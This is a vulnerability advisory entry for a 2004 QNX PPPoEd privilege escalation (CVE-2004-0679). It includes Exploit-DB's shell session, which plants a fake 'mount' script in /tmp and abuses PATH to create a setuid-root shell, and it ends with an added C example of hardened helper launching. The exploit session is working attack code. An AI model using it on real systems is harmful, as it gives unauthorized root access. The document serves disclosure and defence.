Vendor: PPPoEd
By: Unknown
CVSS: 7.5 (HIGH)
Privilege Escalation
CWE: 264
Product Name: PPPoEd
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: CVE-2004-0679
CPE: a:qnx:pppoed
Metasploit:
Other Scripts:
Platforms Tested:
2004

QNX PPPoEd Privilege Escalation Vulnerability

QNX PPPoEd is prone to a vulnerability that allows an attacker to gain elevated privileges on a vulnerable host. The issue stems from how PPPoEd handles paths to the external executables it uses. By exploiting this vulnerability, an attacker can execute arbitrary commands with elevated privileges.

Mitigation:

No known mitigation or remediation is available for this vulnerability.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/11105/info

QNX PPPoEd is reported prone to a problem that exists in the handling of paths to external executables that are employed by PPPoEd. Because of this, an attacker may be able to gain elevated privileges on a host with a vulnerable version of PPPoEd installed.

$ cd /tmp
$ cat << _EOF_ > mount
#!/bin/sh
cp /bin/sh /tmp/rootshell
chown root /tmp/rootshell
chmod 4777 /tmp/rootshell
echo "Here comes your root shell"
_EOF_

$ chmod 755 mount
$ export PATH=/tmp:$PATH
$ /usr/sbin/pppoed
$ ls -la /tmp
-rwxr-xr-x 1 sandimas users 88 Aug 25 2004 mount
-rwsrwxrwx 1 root 100 153384 Jun 22 2001 /tmp/rootshell
$ /tmp/rootshell
Here comes your root shell
# uname -a
QNX sandimas 6.1.0 2001/06/25-15:31:48 edt x86pc x86
#
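
The session above depends on the privileged program resolving a helper through the caller's PATH. The following C code is an added example, not pppoed's code and not part of the original advisory: it shows the hardened launch pattern for a privileged daemon, which accepts only an absolute helper path and calls execve() with a fixed environment. The names run_helper and SAFE_ENV are hypothetical, and the bare-name lookup of mount is an assumption drawn from the session.

```c
/* Added example: hardened helper launch for a privileged daemon.
 * run_helper() and SAFE_ENV are hypothetical names, not pppoed code. */
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fixed environment handed to every helper; the caller's PATH is never inherited. */
static char *const SAFE_ENV[] = { "PATH=/bin:/usr/bin:/sbin:/usr/sbin", NULL };

/* Run a helper by absolute path with the fixed environment.
 * Returns the helper's exit status, or -1 if the request is rejected or fails. */
int run_helper(const char *path, char *const argv[])
{
    pid_t pid;
    int status;

    /* A bare name such as "mount" would need a PATH search: refuse it. */
    if (path == NULL || path[0] != '/')
        return -1;

    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* execve() does no PATH lookup and replaces the whole environment. */
        execve(path, argv, SAFE_ENV);
        _exit(127);                      /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    char *const by_name[] = { "mount", NULL };
    char *const probe[] = { "sh", "-c",
        "test \"$PATH\" = /bin:/usr/bin:/sbin:/usr/sbin", NULL };

    /* Constructed input: a caller-controlled PATH with /tmp in front. */
    setenv("PATH", "/tmp:/bin:/usr/bin", 1);
    printf("bare name rejected: %d\n", run_helper("mount", by_name));
    printf("helper sees fixed PATH: %d\n", run_helper("/bin/sh", probe));
    return 0;
}
```

Because the helper's own children inherit SAFE_ENV, a shell script launched this way also resolves its commands from system directories only.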